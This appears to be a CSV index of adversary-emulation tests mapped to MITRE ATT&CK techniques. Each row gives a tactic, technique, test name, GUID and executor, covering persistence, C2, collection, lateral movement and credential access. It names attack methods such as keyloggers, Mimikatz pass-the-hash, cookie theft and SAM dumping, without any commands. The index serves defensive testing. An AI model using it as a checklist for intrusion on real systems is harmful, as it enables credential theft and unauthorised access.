persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
persistence,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
persistence,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
persistence,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
persistence,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
persistence,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
persistence,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
persistence,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
persistence,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
persistence,T1078.003,Valid Accounts: Local Accounts,10,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,1,DNS Large Query Volume,1700f5d6-5a44-487b-84de-bc66f507b0a6,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,2,DNS Regular Beaconing,3efc144e-1af8-46bb-8ca2-1376bb6db8b6,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,3,DNS Long Domain Query,fef31710-223a-40ee-8462-a396d6b66978,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,4,DNS C2,e7bf9802-2e78-4db9-93b5-181b7bcd37d7,powershell
command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ecca999b-e0c8-40e8-8416-ad320b146a75,powershell
command-and-control,T1219,Remote Access Software,9,UltraViewer - RAT Execution,19acf63b-55c4-4b6a-8552-00a8865105c8,powershell
command-and-control,T1219,Remote Access Software,10,UltraVNC Execution,42e51815-a6cc-4c75-b970-3f0ff54b610e,powershell
command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b8128b-c5d4-4de9-bf70-e60419274562,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
command-and-control,T1090.003,Proxy: Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
command-and-control,T1090.003,Proxy: Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,4,Tor Proxy Usage - MacOS,12631354-fdbc-4164-92be-402527e748da,sh
command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used port with PowerShell,21fe622f-8e53-4b31-ba83-6d333c2583f4,powershell
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1573,Encrypted Channel,1,OpenSSL C2,21caf58e-87ad-440c-a6b8-3ac259964003,powershell
command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
command-and-control,T1095,Non-Application Layer Protocol,3,Powercat C2,3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e,powershell
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,bash
command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,bash
command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,bash
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
command-and-control,T1105,Ingress Tool Transfer,7,certutil download (urlcache),dd3b61dd-7bbc-48cd-ab51-49ad1a776df0,command_prompt
command-and-control,T1105,Ingress Tool Transfer,8,certutil download (verifyctl),ffd492e3-0455-4518-9fb1-46527c9f241b,powershell
command-and-control,T1105,Ingress Tool Transfer,9,Windows - BITSAdmin BITS Download,a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b,command_prompt
command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download,42dc4460-9aa6-45d3-b1a6-3955d34e1fe8,powershell
command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
command-and-control,T1105,Ingress Tool Transfer,16,File download with finger.exe on Windows,5f507e45-8411-4f99-84e7-e38530c45d01,command_prompt
command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD.exe,1a02df58-09af-4064-a765-0babe1a0d1e2,powershell
command-and-control,T1105,Ingress Tool Transfer,18,Curl Download File,2b080b99-0deb-4d51-af0f-833d37c4ca6a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,19,Curl Upload File,635c9a38-6cbf-47dc-8615-3810bc1167cf,command_prompt
command-and-control,T1105,Ingress Tool Transfer,20,Download a file with Microsoft Connection Manager Auto-Download,d239772b-88e2-4a2e-8473-897503401bcc,command_prompt
command-and-control,T1105,Ingress Tool Transfer,21,MAZE Propagation Script,70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf,powershell
command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Line Tool UNC share folder into a zip file,49845fc1-7961-4590-a0f0-3dbcf065ae7e,command_prompt
command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt
command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
command-and-control,T1105,Ingress Tool Transfer,27,Linux Download File and Run,bdc373c5-e9cf-4563-8a7b-a9ba720a90f3,sh
command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b1729c57-9384-4d1c-9b99-9b220afb384e,command_prompt
command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request download,c01cad7f-7a4c-49df-985e-b190dcf6a279,command_prompt
command-and-control,T1090.001,Proxy: Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Proxy: Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
command-and-control,T1090.001,Proxy: Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
collection,T1560.001,Archive Collected Data: Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash
collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
collection,T1113,Screen Capture,6,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
collection,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
collection,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
collection,T1056.001,Input Capture: Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
collection,T1056.001,Input Capture: Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
collection,T1056.001,Input Capture: Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
collection,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
collection,T1123,Audio Capture,3,using Quicktime Player,c7a0bb71-70ce-4a53-b115-881f241b795b,sh
collection,T1074.001,Data Staged: Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1074.001,Data Staged: Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
collection,T1114.001,Email Collection: Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell
collection,T1115,Clipboard Data,5,Add or copy content to clipboard with xClip,ee363e53-b083-4230-aff3-f8d955f2d5bb,sh
collection,T1530,Data from Cloud Storage Object,1,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
collection,T1530,Data from Cloud Storage Object,2,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
collection,T1530,Data from Cloud Storage Object,3,AWS - Scan for Anonymous Access to S3,979356b9-b588-4e49-bba4-c35517c484f5,sh
collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
collection,T1560.002,Archive Collected Data: Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
collection,T1560.002,Archive Collected Data: Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
collection,T1560.002,Archive Collected Data: Archive via Library,4,Compressing data using tarfile in Python (Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,bash
collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
collection,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
collection,T1125,Video Capture,1,Registry artefact when application use webcam,6581e4a7-42e3-43c5-a0d2-5a0d62f9702a,command_prompt
collection,T1114.003,Email Collection: Email Forwarding Rule,1,Office365 - Email Forwarding,3234117e-151d-4254-9150-3d0bac41e38c,powershell
collection,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
collection,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
collection,T1039,Data from Network Shared Drive,1,Copy a sensitive File over Administrative share with copy,6ed67921-1774-44ba-bac6-adb51ed60660,command_prompt
collection,T1039,Data from Network Shared Drive,2,Copy a sensitive File over Administrative share with Powershell,7762e120-5879-44ff-97f8-008b401b9a98,powershell
collection,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
lateral-movement,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,1,Map admin share,3386975b-367a-4fbb-9d77-4dcf3639ffd3,command_prompt
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
lateral-movement,T1021.006,Remote Services: Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
lateral-movement,T1021.006,Remote Services: Windows Remote Management,2,Remote Code Execution with PS Credentials Using Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Remote Services: Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
lateral-movement,T1021.003,Remote Services: Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
lateral-movement,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
lateral-movement,T1563.002,Remote Service Session Hijacking: RDP Hijacking,1,RDP hijacking,a37ac520-b911-458e-8aed-c5f1576d9f46,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,1,RDP to DomainController,355d4632-8cb9-449d-91ce-b566d0253d3e,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,2,Changing RDP Port to Non Standard Port via Powershell,2f840dd4-8a2e-4f44-beb3-6b2399ea3771,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,3,Changing RDP Port to Non Standard Port via Command_Prompt,74ace21e-a31c-4f7d-b540-53e4eb6d1f73,command_prompt
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
credential-access,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
credential-access,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
credential-access,T1056.001,Input Capture: Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
credential-access,T1056.001,Input Capture: Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
credential-access,T1056.001,Input Capture: Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
credential-access,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
credential-access,T1110.001,Brute Force: Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
credential-access,T1003,OS Credential Dumping,4,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list),6c7a4fd3-5b0b-4b30-a93e-39411b25d889,powershell
credential-access,T1003,OS Credential Dumping,5,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config),42510244-5019-48fa-a0e5-66c3b76e6049,powershell
credential-access,T1003,OS Credential Dumping,6,Dump Credential Manager using keymgr.dll and rundll32.exe,84113186-ed3c-4d0d-8a3c-8980c86c1f4a,powershell
credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,4,PowerDump Hashes and Usernames from Registry,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,7,WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes,0c0f5f06-166a-4f4d-bb4a-719df9a01dbb,powershell
credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,1,Azure - Search Azure AD User Attributes for Passwords,ae9b2e3e-efa1-4483-86e2-fae529ab9fb6,powershell
credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,2,Azure - Dump Azure Instance Metadata from Virtual Machines,cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7,powershell
credential-access,T1110.002,Brute Force: Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1003.004,OS Credential Dumping: LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
credential-access,T1606.002,Forge Web Credentials: SAML token,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
credential-access,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
credential-access,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
credential-access,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
credential-access,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
credential-access,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
credential-access,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
credential-access,T1040,Network Sniffing,9,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
credential-access,T1040,Network Sniffing,10,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
credential-access,T1040,Network Sniffing,11,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
credential-access,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash
credential-access,T1552.002,Unsecured Credentials: Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Unsecured Credentials: Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
